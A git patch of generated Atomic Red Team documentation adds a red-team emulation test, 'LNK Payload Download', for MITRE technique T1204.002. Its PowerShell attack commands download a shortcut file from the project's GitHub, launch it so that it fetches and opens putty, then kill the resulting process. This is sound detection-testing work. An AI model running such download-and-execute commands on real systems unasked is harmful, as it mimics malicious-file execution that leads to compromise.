From a5ca285de1480fd19815761a48c8e08fd75b5eac Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Fri, 6 May 2022 04:43:44 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 19 +++++++++
 atomics/T1204.002/T1204.002.md                | 41 +++++++++++++++++++
 6 files changed, 64 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 12af6a6d..baa3bf9d 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1024,6 +1024,7 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
 execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
 execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
 execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
+execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 0db5d339..9116f8e6 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -743,6 +743,7 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
 execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
 execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
 execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
+execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 90b52ac8..57adc896 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1673,6 +1673,7 @@
   - Atomic Test #7: Headless Chrome code execution via VBA [windows]
   - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
   - Atomic Test #9: Office Generic Payload Download [windows]
+  - Atomic Test #10: LNK Payload Download [windows]
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1106 Native API](../../T1106/T1106.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index c93943b8..85a0719c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1220,6 +1220,7 @@
   - Atomic Test #7: Headless Chrome code execution via VBA [windows]
   - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
   - Atomic Test #9: Office Generic Payload Download [windows]
+  - Atomic Test #10: LNK Payload Download [windows]
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1106 Native API](../../T1106/T1106.md)
   - Atomic Test #1: Execution through API - CreateProcess [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b371f4cb..53f08b4c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -68868,6 +68868,25 @@ execution:
           -ErrorAction Ignore
 
           '
+    - name: LNK Payload Download
+      auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
+      description: This lnk files invokes powershell to download putty from the internet
+        and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
+          $file1 = "$env:Temp\test10.lnk"
+          Start-Process $file1
+          Start-Sleep -s 10
+          taskkill /IM a.exe /F
+        cleanup_command: |-
+          $file1 = "$env:Temp\test10.lnk"
+          $file2 = "$env:Temp\a.exe"
+          Remove-Item $file1 -ErrorAction Ignore
+          Remove-Item $file2 -ErrorAction Ignore
+        name: powershell
   T1204.003:
     technique:
       object_marking_refs:
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index fabd09e2..969caa07 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -26,6 +26,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
 
 - [Atomic Test #9 - Office Generic Payload Download](#atomic-test-9---office-generic-payload-download)
 
+- [Atomic Test #10 - LNK Payload Download](#atomic-test-10---lnk-payload-download)
+
 
 <br/>
 
@@ -584,4 +586,43 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - LNK Payload Download
+This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 581d7521-9c4b-420e-9695-2aec5241167f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
+$file1 = "$env:Temp\test10.lnk"
+Start-Process $file1
+Start-Sleep -s 10
+taskkill /IM a.exe /F
+```
+
+#### Cleanup Commands:
+```powershell
+$file1 = "$env:Temp\test10.lnk"
+$file2 = "$env:Temp\a.exe"
+Remove-Item $file1 -ErrorAction Ignore
+Remove-Item $file2 -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>